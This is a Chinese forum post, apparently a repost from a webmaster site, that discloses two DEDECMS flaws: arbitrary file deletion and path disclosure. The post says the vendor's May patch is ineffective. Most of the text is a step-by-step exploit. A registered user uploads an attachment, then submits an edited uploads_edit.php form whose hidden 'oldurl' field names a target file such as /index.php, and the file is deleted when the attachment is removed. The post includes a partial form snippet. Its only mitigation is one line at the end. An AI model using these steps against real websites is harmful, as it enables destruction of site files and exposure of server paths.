农业发展论坛.探讨现代农业技术与发展。

 找回密码
 立即注册
查看: 8|回复: 0

DEDECMS 最新漏洞可任意删除文件

[复制链接]

主题

帖子

5

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
5
发表于 2024-7-12 15:39:41 | 显示全部楼层 |阅读模式
DEDECMS 最新漏洞,可任意删除文件。DEDE在五月发布了最新的补丁。可是这个补丁并没有用。现在将些BUG发布出来。
    1.删除网站任意文件.
    2.显示对路径
    1.删除任意文件.
    注册正常用户...随意找个地方上传个附件就OK.
    部分代码:
     form class=mTB10 mL10 mR10 name=form1 action=uploads_edit.php method=post enctype=multipart/form-datainput type=hidden name=aid value=28 /input type=hidden name=mediatype value=1 /input type=hidden name=oldurl value=要删除的文件 / !--如value=/index.php input type=hidden name=dopost value=save /table cellspacing=1 class=submit
    修改完毕后.打开HTML页.直接点提交.
    然后在用户管理附件里点击删除.
    2.爆路径.
    也是利用原来的html代码..
    td align=right valign=top更换附件:/td tdinput name=addonfile type=file id=addonfile style=width:300px //td 把type=file删除.保存.然后打开.直接点提交.
    就可以爆路径了..
    临时解决方法.:禁止用户注册.或禁止用户发附件
    聚站吧|站长资讯交流群 欢迎大家前来交流。
    首发:聚站吧|站长资讯 如有请保留出处。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|农业发展论坛

GMT+8, 2024-11-23 00:57 , Processed in 0.030876 second(s), 19 queries .

Powered by Discuz! X3.4

© 2001-2013 Discuz Team.. 技术支持 by 巅峰设计

快速回复 返回顶部 返回列表